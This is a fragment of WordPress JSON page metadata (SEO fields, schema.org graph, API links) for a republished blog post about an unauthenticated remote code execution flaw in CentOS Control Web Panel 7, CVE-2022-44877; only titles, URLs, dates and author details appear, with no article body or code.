-->","yoast_head_json":{"title":"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877","og_locale":"zh_HK","og_type":"article","og_title":"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 2","og_description":"Introduction Unauthenticated RCE in Centos Web Panel 7\u200a [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877","og_site_name":"Version 2","article_published_time":"2023-01-26T23:04:17+00:00","article_modified_time":"2024-09-13T08:31:48+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png","type":"","width":"","height":""}],"author":"versionpan","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"versionpan","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"10 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/01\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\/"},"author":{"name":"versionpan","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8"},"headline":"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) 
-\u200aCVE-2022\u201344877","datePublished":"2023-01-26T23:04:17+00:00","dateModified":"2024-09-13T08:31:48+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/01\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\/"},"wordCount":1186,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png","keywords":["vRx","2023"],"articleSection":["vRx","2023","Press Release"],"inLanguage":"zh-HK"},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/01\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\/","url":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877","name":"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 
2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png","datePublished":"2023-01-26T23:04:17+00:00","dateModified":"2024-09-13T08:31:48+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png","contentUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/zh\/"},{"@type":"ListItem","position":2,"name":"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 
2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8","name":"versionpan","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","caption":"versionpan"},"url":"https:\/\/version-2.com\/zh\/author\/versionpan\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-fVJ","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61239","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ver
sion-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/148637484"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=61239"}],"version-history":[{"count":17,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61239\/revisions"}],"predecessor-version":[{"id":69409,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61239\/revisions\/69409"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=61239"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=61239"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=61239"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}